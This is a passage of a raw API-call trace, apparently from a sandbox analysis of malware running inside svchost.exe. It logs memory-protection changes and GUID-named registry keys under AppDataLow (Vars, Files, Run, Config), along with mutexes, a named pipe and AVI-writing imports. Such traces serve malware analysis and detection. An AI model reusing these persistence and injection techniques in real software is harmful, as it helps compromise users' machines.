Name="OpenEventA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5630) returned 0x0 [0207.271] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="lstrcmpiW", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ac65d0) returned 0x0 [0207.271] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="RaiseException", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977aceba0) returned 0x0 [0207.271] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetSystemInfo", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977acf580) returned 0x0 [0207.271] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="Process32NextW", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977acb8f0) returned 0x0 [0207.271] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="Process32FirstW", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad0020) returned 0x0 [0207.271] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="QueueUserWorkItem", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad0f60) returned 0x0 [0207.271] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="FileTimeToLocalFileTime", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad57b0) returned 0x0 [0207.271] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="FindClose", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad57c0) returned 0x0 [0207.271] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetDriveTypeW", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad58f0) returned 0x0 [0207.271] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="VirtualProtectEx", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977af3630) returned 0x0 [0207.271] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="AVIFIL32.dll", BaseAddress=0xb0938cfc08 | out: BaseAddress=0xb0938cfc08*=0x7ff972350000) returned 0x0 [0207.817] LdrGetProcedureAddress (in: BaseAddress=0x7ff972350000, Name="AVIStreamRelease", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff9723569a0) returned 0x0 [0207.817] LdrGetProcedureAddress (in: BaseAddress=0x7ff972350000, Name="AVIStreamWrite", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff972357230) returned 0x0 [0207.817] LdrGetProcedureAddress (in: BaseAddress=0x7ff972350000, Name="AVIFileOpenA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff9723568b0) returned 0x0 [0207.817] LdrGetProcedureAddress (in: BaseAddress=0x7ff972350000, Name="AVIFileCreateStreamA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff972356c10) returned 0x0 [0207.817] LdrGetProcedureAddress (in: BaseAddress=0x7ff972350000, Name="AVIStreamSetFormat", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff972357070) returned 0x0 [0207.817] LdrGetProcedureAddress (in: BaseAddress=0x7ff972350000, Name="AVIFileExit", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff972356400) returned 0x0 [0207.818] LdrGetProcedureAddress (in: BaseAddress=0x7ff972350000, Name="AVIFileInit", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff9723563d0) returned 0x0 [0207.818] LdrGetProcedureAddress (in: BaseAddress=0x7ff972350000, Name="AVIMakeCompressedStream", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff972357910) returned 0x0 [0207.818] LdrGetProcedureAddress (in: BaseAddress=0x7ff972350000, Name="AVIFileRelease", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff9723569a0) returned 0x0 [0207.818] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0xb0938cfbf8*=0x810000, NumberOfBytesToProtect=0xb0938cfc00, NewAccessProtection=0x4, OldAccessProtection=0xb0938cfbf0 | out: BaseAddress=0xb0938cfbf8*=0x810000, NumberOfBytesToProtect=0xb0938cfc00, OldAccessProtection=0xb0938cfbf0*=0x40) returned 0x0 [0207.818] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0xb0938cfb90*=0x811000, NumberOfBytesToProtect=0xb0938cfc00, NewAccessProtection=0x20, OldAccessProtection=0xb0938cfbf0 | out: BaseAddress=0xb0938cfb90*=0x811000, NumberOfBytesToProtect=0xb0938cfc00, OldAccessProtection=0xb0938cfbf0*=0x40) returned 0x0 [0207.818] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0xb0938cfb90*=0x849000, NumberOfBytesToProtect=0xb0938cfc00, NewAccessProtection=0x2, OldAccessProtection=0xb0938cfbf0 | out: BaseAddress=0xb0938cfb90*=0x849000, NumberOfBytesToProtect=0xb0938cfc00, OldAccessProtection=0xb0938cfbf0*=0x40) returned 0x0 [0207.819] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0xb0938cfb90*=0x873000, NumberOfBytesToProtect=0xb0938cfc00, NewAccessProtection=0x4, OldAccessProtection=0xb0938cfbf0 | out: BaseAddress=0xb0938cfb90*=0x873000, NumberOfBytesToProtect=0xb0938cfc00, OldAccessProtection=0xb0938cfbf0*=0x40) returned 0x0 [0207.819] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0xb0938cfb90*=0x878000, NumberOfBytesToProtect=0xb0938cfc00, NewAccessProtection=0x2, OldAccessProtection=0xb0938cfbf0 | out: BaseAddress=0xb0938cfb90*=0x878000, NumberOfBytesToProtect=0xb0938cfc00, OldAccessProtection=0xb0938cfbf0*=0x40) returned 0x0 [0207.819] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0xb0938cfb90*=0x87a000, NumberOfBytesToProtect=0xb0938cfc00, NewAccessProtection=0x4, OldAccessProtection=0xb0938cfbf0 | out: BaseAddress=0xb0938cfb90*=0x87a000, NumberOfBytesToProtect=0xb0938cfc00, OldAccessProtection=0xb0938cfbf0*=0x40) returned 0x0 [0207.819] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0xb0938cfb90*=0x87c000, NumberOfBytesToProtect=0xb0938cfc00, NewAccessProtection=0x2, OldAccessProtection=0xb0938cfbf0 | out: BaseAddress=0xb0938cfb90*=0x87c000, NumberOfBytesToProtect=0xb0938cfc00, OldAccessProtection=0xb0938cfbf0*=0x40) returned 0x0 [0207.822] GetTickCount () returned 0x1abcb [0207.822] GetModuleHandleA (lpModuleName=0x0) returned 0x7ff7ce3a0000 [0207.822] GetVersion () returned 0x2800000a [0207.822] GetCurrentProcessId () returned 0x198 [0207.822] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x164 [0207.822] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xb095a02040, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0207.822] lstrcpynA (in: lpString1=0xb0938cfb40, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0207.823] GetModuleHandleA (lpModuleName="KERNEL32.DLL") returned 0x7ff977ab0000 [0207.823] GetProcAddress (hModule=0x7ff977ab0000, lpProcName="IsWow64Process") returned 0x7ff977ace960 [0207.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x168 [0207.823] IsWow64Process (in: hProcess=0x168, Wow64Process=0xb0938cfae0 | out: Wow64Process=0xb0938cfae0) returned 1 [0207.823] CloseHandle (hObject=0x168) returned 1 [0207.823] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x7ff976f80000 [0207.824] GetProcAddress (hModule=0x7ff976f80000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorA") returned 0x7ff976f9d610 [0207.824] ConvertStringSecurityDescriptorToSecurityDescriptorA () returned 0x1 [0207.832] NtOpenProcess (in: ProcessHandle=0xb0938cfa98, DesiredAccess=0x400, ObjectAttributes=0xb0938cfa30*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xb0938cfa20*(UniqueProcess=0x198, UniqueThread=0x0) | out: ProcessHandle=0xb0938cfa98*=0x184) returned 0x0 [0207.832] NtOpenProcessToken (in: ProcessHandle=0x184, DesiredAccess=0x8, TokenHandle=0xb0938cfa90 | out: TokenHandle=0xb0938cfa90*=0x188) returned 0x0 [0207.832] NtQueryInformationToken (in: TokenHandle=0x188, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xb0938cfa80 | out: TokenInformation=0x0, ReturnLength=0xb0938cfa80) returned 0xc0000023 [0207.832] NtQueryInformationToken (in: TokenHandle=0x188, TokenInformationClass=0x1, TokenInformation=0xb095a02260, TokenInformationLength=0x2c, ReturnLength=0xb0938cfa80 | out: TokenInformation=0xb095a02260, ReturnLength=0xb0938cfa80) returned 0x0 [0207.832] NtClose (Handle=0x188) returned 0x0 [0207.832] NtClose (Handle=0x184) returned 0x0 [0207.833] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ff977360000 [0207.833] GetProcAddress (hModule=0x7ff977360000, lpProcName="StrRChrA") returned 0x7ff977374dd0 [0207.833] StrRChrA (lpStart="C:\\Windows\\system32\\svchost.exe", lpEnd=0x0, wMatch=0x5c) returned="\\svchost.exe" [0207.833] _strupr (in: _String=0xb095a02054 | out: _String="SVCHOST.EXE") returned="SVCHOST.EXE" [0207.833] lstrlenA (lpString="SVCHOST.EXE") returned 11 [0207.833] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x184 [0207.833] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ff9757b0000 [0207.834] GetProcAddress (hModule=0x7ff9757b0000, lpProcName="wsprintfA") returned 0x7ff9757d2610 [0207.834] wsprintfA (in: param_1=0xb095a02260, param_2="%08X-%04X-%04X-%04X-%08X%04X" | out: param_1="667F6611-8D0F-88EB-47FA-113C6BCED530") returned 36 [0207.834] lstrlenA (lpString="Software\\AppDataLow\\Software\\Microsoft\\") returned 39 [0207.834] lstrcpyA (in: lpString1=0xb095a022a0, lpString2="Software\\AppDataLow\\Software\\Microsoft\\" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\") returned="Software\\AppDataLow\\Software\\Microsoft\\" [0207.834] lstrcatA (in: lpString1="Software\\AppDataLow\\Software\\Microsoft\\", lpString2="667F6611-8D0F-88EB-47FA-113C6BCED530" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530") returned="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530" [0207.834] lstrlenA (lpString="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530") returned 75 [0207.834] lstrlenA (lpString="\\Vars") returned 5 [0207.834] lstrcpyA (in: lpString1=0xb095a02300, lpString2="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530") returned="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530" [0207.834] lstrcatA (in: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", lpString2="\\Vars" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530\\Vars") returned="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530\\Vars" [0207.834] lstrlenA (lpString="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530") returned 75 [0207.834] lstrlenA (lpString="\\Files") returned 6 [0207.834] lstrcpyA (in: lpString1=0xb095a02370, lpString2="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530") returned="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530" [0207.834] lstrcatA (in: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", lpString2="\\Files" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530\\Files") returned="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530\\Files" [0207.834] lstrlenA (lpString="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530") returned 75 [0207.834] lstrlenA (lpString="\\Run") returned 4 [0207.834] lstrcpyA (in: lpString1=0xb095a023e0, lpString2="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530") returned="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530" [0207.834] lstrcatA (in: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", lpString2="\\Run" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530\\Run") returned="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530\\Run" [0207.834] lstrlenA (lpString="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530") returned 75 [0207.834] lstrlenA (lpString="\\Config") returned 7 [0207.834] lstrcpyA (in: lpString1=0xb095a02440, lpString2="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530") returned="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530" [0207.834] lstrcatA (in: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", lpString2="\\Config" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530\\Config") returned="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530\\Config" [0207.834] wsprintfA (in: param_1=0xb095a02260, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{2F87B751-C28A-394B-44D3-167DB8B7AA01}") returned 38 [0207.835] lstrlenA (lpString="Local\\") returned 6 [0207.835] lstrcpyA (in: lpString1=0xb095a024b0, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0207.835] lstrcatA (in: lpString1="Local\\", lpString2="{2F87B751-C28A-394B-44D3-167DB8B7AA01}" | out: lpString1="Local\\{2F87B751-C28A-394B-44D3-167DB8B7AA01}") returned="Local\\{2F87B751-C28A-394B-44D3-167DB8B7AA01}" [0207.835] wsprintfA (in: param_1=0xb095a02260, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{6C433A47-DB67-7E7B-C560-3F92C994E3E6}") returned 38 [0207.835] lstrlenA (lpString="Local\\") returned 6 [0207.835] lstrcpyA (in: lpString1=0xb095a024f0, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0207.835] lstrcatA (in: lpString1="Local\\", lpString2="{6C433A47-DB67-7E7B-C560-3F92C994E3E6}" | out: lpString1="Local\\{6C433A47-DB67-7E7B-C560-3F92C994E3E6}") returned="Local\\{6C433A47-DB67-7E7B-C560-3F92C994E3E6}" [0207.835] wsprintfA (in: param_1=0xb095a02260, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{0D65F8EA-0843-C78A-7A91-BCEB4E55B04F}") returned 38 [0207.835] lstrlenA (lpString="Local\\") returned 6 [0207.835] lstrcpyA (in: lpString1=0xb095a02530, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0207.835] lstrcatA (in: lpString1="Local\\", lpString2="{0D65F8EA-0843-C78A-7A91-BCEB4E55B04F}" | out: lpString1="Local\\{0D65F8EA-0843-C78A-7A91-BCEB4E55B04F}") returned="Local\\{0D65F8EA-0843-C78A-7A91-BCEB4E55B04F}" [0207.835] wsprintfA (in: param_1=0xb095a02260, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{62D813F7-59FC-E439-F3B6-9D58D74A210C}") returned 38 [0207.835] lstrlenA (lpString="Local\\") returned 6 [0207.835] lstrcpyA (in: lpString1=0xb095a02570, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0207.835] lstrcatA (in: lpString1="Local\\", lpString2="{62D813F7-59FC-E439-F3B6-9D58D74A210C}" | out: lpString1="Local\\{62D813F7-59FC-E439-F3B6-9D58D74A210C}") returned="Local\\{62D813F7-59FC-E439-F3B6-9D58D74A210C}" [0207.835] wsprintfA (in: param_1=0xb095a02260, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{FB999B87-1EC7-E503-005F-32E93403862D}") returned 38 [0207.835] lstrlenA (lpString="Local\\") returned 6 [0207.835] lstrcpyA (in: lpString1=0xb095a025b0, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0207.835] lstrcatA (in: lpString1="Local\\", lpString2="{FB999B87-1EC7-E503-005F-32E93403862D}" | out: lpString1="Local\\{FB999B87-1EC7-E503-005F-32E93403862D}") returned="Local\\{FB999B87-1EC7-E503-005F-32E93403862D}" [0207.835] wsprintfA (in: param_1=0xb095a02260, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{A8435A97-E752-1A33-B15C-0BEE75506F02}") returned 38 [0207.836] lstrlenA (lpString="Local\\") returned 6 [0207.836] lstrcpyA (in: lpString1=0xb095a025f0, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0207.836] lstrcatA (in: lpString1="Local\\", lpString2="{A8435A97-E752-1A33-B15C-0BEE75506F02}" | out: lpString1="Local\\{A8435A97-E752-1A33-B15C-0BEE75506F02}") returned="Local\\{A8435A97-E752-1A33-B15C-0BEE75506F02}" [0207.836] wsprintfA (in: param_1=0xb095a02260, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{793DD25A-8448-133A-56BD-F8F7EA41AC1B}") returned 38 [0207.836] lstrlenA (lpString="Local\\") returned 6 [0207.836] lstrcpyA (in: lpString1=0xb095a02630, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0207.836] lstrcatA (in: lpString1="Local\\", lpString2="{793DD25A-8448-133A-56BD-F8F7EA41AC1B}" | out: lpString1="Local\\{793DD25A-8448-133A-56BD-F8F7EA41AC1B}") returned="Local\\{793DD25A-8448-133A-56BD-F8F7EA41AC1B}" [0207.836] wsprintfA (in: param_1=0xb095a02260, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{BEE2402B-052B-A020-7FD2-09D423264D48}") returned 38 [0207.836] lstrlenA (lpString="Local\\") returned 6 [0207.836] lstrcpyA (in: lpString1=0xb095a02670, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0207.836] lstrcatA (in: lpString1="Local\\", lpString2="{BEE2402B-052B-A020-7FD2-09D423264D48}" | out: lpString1="Local\\{BEE2402B-052B-A020-7FD2-09D423264D48}") returned="Local\\{BEE2402B-052B-A020-7FD2-09D423264D48}" [0207.836] wsprintfA (in: param_1=0xb095a02260, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{072BB6F5-BAEC-D114-FC2B-8E95F08FA299}") returned 38 [0207.836] lstrlenA (lpString="\\\\.\\pipe\\") returned 9 [0207.836] lstrcpyA (in: lpString1=0xb095a026b0, lpString2="\\\\.\\pipe\\" | out: lpString1="\\\\.\\pipe\\") returned="\\\\.\\pipe\\" [0207.836] lstrcatA (in: lpString1="\\\\.\\pipe\\", lpString2="{072BB6F5-BAEC-D114-FC2B-8E95F08FA299}" | out: lpString1="\\\\.\\pipe\\{072BB6F5-BAEC-D114-FC2B-8E95F08FA299}") returned="\\\\.\\pipe\\{072BB6F5-BAEC-D114-FC2B-8E95F08FA299}" [0207.836] wsprintfA (in: param_1=0xb095a02260, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned 38 [0207.836] lstrlenA (lpString="%APPDATA%\\Microsoft\\") returned 20 [0207.836] lstrcpyA (in: lpString1=0xb095a026f0, lpString2="%APPDATA%\\Microsoft\\" | out: lpString1="%APPDATA%\\Microsoft\\") returned="%APPDATA%\\Microsoft\\" [0207.836] lstrcatA (in: lpString1="%APPDATA%\\Microsoft\\", lpString2="{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="%APPDATA%\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="%APPDATA%\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0207.836] wsprintfA (in: param_1=0xb095a02260, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{25E2F79F-402D-9FBF-7229-7443C66DE827}") returned 38 [0207.836] lstrlenA (lpString="%APPDATA%\\Microsoft\\") returned 20 [0207.837] lstrcpyA (in: lpString1=0xb095a02740, lpString2="%APPDATA%\\Microsoft\\" | out: lpString1="%APPDATA%\\Microsoft\\") returned="%APPDATA%\\Microsoft\\" [0207.837] lstrcatA (in: lpString1="%APPDATA%\\Microsoft\\", lpString2="{25E2F79F-402D-9FBF-7229-7443C66DE827}" | out: lpString1="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}") returned="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}" [0207.837] wsprintfA (in: param_1=0xb095a02260, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{5A76122F-F1D1-9CA2-4B2E-B590AF42B9C4}") returned 38 [0207.837] lstrlenA (lpString="%APPDATA%\\Microsoft\\") returned 20 [0207.837] lstrcpyA (in: lpString1=0xb095a02790, lpString2="%APPDATA%\\Microsoft\\" | out: lpString1="%APPDATA%\\Microsoft\\") returned="%APPDATA%\\Microsoft\\" [0207.837] lstrcatA (in: lpString1="%APPDATA%\\Microsoft\\", lpString2="{5A76122F-F1D1-9CA2-4B2E-B590AF42B9C4}" | out: lpString1="%APPDATA%\\Microsoft\\{5A76122F-F1D1-9CA2-4B2E-B590AF42B9C4}") returned="%APPDATA%\\Microsoft\\{5A76122F-F1D1-9CA2-4B2E-B590AF42B9C4}" [0207.837] wsprintfA (in: param_1=0xb095a02260, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{53667D0F-9637-FD89-3837-2A81EC5BFE45}") returned 38 [0207.837] lstrlenA (lpString="Local\\") returned 6 [0207.837] lstrcpyA (in: lpString1=0xb095a027e0, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0207.837] lstrcatA (in: lpString1="Local\\", lpString2="{53667D0F-9637-FD89-3837-2A81EC5BFE45}" | out: lpString1="Local\\{53667D0F-9637-FD89-3837-2A81EC5BFE45}") returned="Local\\{53667D0F-9637-FD89-3837-2A81EC5BFE45}" [0207.837] wsprintfA (in: param_1=0xb095a02260, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{E089BDC1-BF33-12AE-4914-63668D8847FA}") returned 38 [0207.837] lstrlenA (lpString="Local\\") returned 6 [0207.837] lstrcpyA (in: lpString1=0xb095a02820, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0207.837] lstrcatA (in: lpString1="Local\\", lpString2="{E089BDC1-BF33-12AE-4914-63668D8847FA}" | out: lpString1="Local\\{E089BDC1-BF33-12AE-4914-63668D8847FA}") returned="Local\\{E089BDC1-BF33-12AE-4914-63668D8847FA}" [0207.837] wsprintfA (in: param_1=0xb095a02260, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{111F6A44-3C4D-6BC7-CED5-30CFE2D96473}") returned 38 [0207.837] lstrlenA (lpString="Local\\") returned 6 [0207.837] lstrcpyA (in: lpString1=0xb095a02860, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0207.837] lstrcatA (in: lpString1="Local\\", lpString2="{111F6A44-3C4D-6BC7-CED5-30CFE2D96473}" | out: lpString1="Local\\{111F6A44-3C4D-6BC7-CED5-30CFE2D96473}") returned="Local\\{111F6A44-3C4D-6BC7-CED5-30CFE2D96473}" [0207.837] wsprintfA (in: param_1=0xb095a02260, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{36CFCEF2-1DFD-D85B-57CA-A18C7B9E6580}") returned 38 [0207.837] lstrlenA (lpString="Local\\") returned 6 [0207.837] lstrcpyA (in: lpString1=0xb095a028a0, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0207.837] lstrcatA (in: lpString1="Local\\", lpString2="{36CFCEF2-1DFD-D85B-57CA-A18C7B9E6580}" | out: lpString1="Local\\{36CFCEF2-1DFD-D85B-57CA-A18C7B9E6580}") returned="Local\\{36CFCEF2-1DFD-D85B-57CA-A18C7B9E6580}" [0207.838] wsprintfA (in: param_1=0xb095a02260, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{1E24E139-E5BC-00C9-5F32-E93403862DA8}") returned 38 [0207.838] lstrcatA (in: lpString1="", lpString2="{1E24E139-E5BC-00C9-5F32-E93403862DA8}" | out: lpString1="{1E24E139-E5BC-00C9-5F32-E93403862DA8}") returned="{1E24E139-E5BC-00C9-5F32-E93403862DA8}" [0207.838] RtlAddVectoredExceptionHandler (FirstHandler=0x0, VectoredHandler=0x82c4bc) returned 0xb093b154a0 [0207.838] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="{1E24E139-E5BC-00C9-5F32-E93403862DA8}") returned 0x188 [0207.838] GetLastError () returned 0x0 [0207.838] GetProcAddress (hModule=0x7ff976f80000, lpProcName="RegOpenKeyA") returned 0x7ff976f9b9e0 [0207.838] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", phkResult=0xb0938cf9d0 | out: phkResult=0xb0938cf9d0*=0x190) returned 0x0 [0207.838] GetProcAddress (hModule=0x7ff976f80000, lpProcName="RegQueryValueExA") returned 0x7ff976f97dd0 [0207.838] RegQueryValueExA (in: hKey=0x190, lpValueName="Ini", lpReserved=0x0, lpType=0xb0938cf950, lpData=0x0, lpcbData=0xb0938cf9c8*=0x87d018 | out: lpType=0xb0938cf950*=0x0, lpData=0x0, lpcbData=0xb0938cf9c8*=0x0) returned 0x2 [0207.839] GetProcAddress (hModule=0x7ff976f80000, lpProcName="RegCloseKey") returned 0x7ff976f972e0 [0207.839] RegCloseKey (hKey=0x190) returned 0x0 [0207.839] GetProcAddress (hModule=0x7ff977360000, lpProcName="StrToIntExA") returned 0x7ff977374e70 [0207.839] StrToIntExA (in: pszString="40", dwFlags=0x0, piRet=0xb0938cf9c8 | out: piRet=0xb0938cf9c8) returned 1 [0207.839] StrToIntExA (in: pszString="1200", dwFlags=0x0, piRet=0xb0938cf9c8 | out: piRet=0xb0938cf9c8) returned 1 [0207.839] StrToIntExA (in: pszString="300", dwFlags=0x0, piRet=0xb0938cf9c8 | out: piRet=0xb0938cf9c8) returned 1 [0207.839] StrToIntExA (in: pszString="300", dwFlags=0x0, piRet=0xb0938cf9c8 | out: piRet=0xb0938cf9c8) returned 1 [0207.839] StrToIntExA (in: pszString="300", dwFlags=0x0, piRet=0xb0938cf9c8 | out: piRet=0xb0938cf9c8) returned 1 [0207.839] StrToIntExA (in: pszString="10", dwFlags=0x0, piRet=0xb0938cf9c8 | out: piRet=0xb0938cf9c8) returned 1 [0207.839] StrToIntExA (in: pszString="1000", dwFlags=0x0, piRet=0xb0938cf9c8 | out: piRet=0xb0938cf9c8) returned 1 [0207.839] StrToIntExA (in: pszString="12", 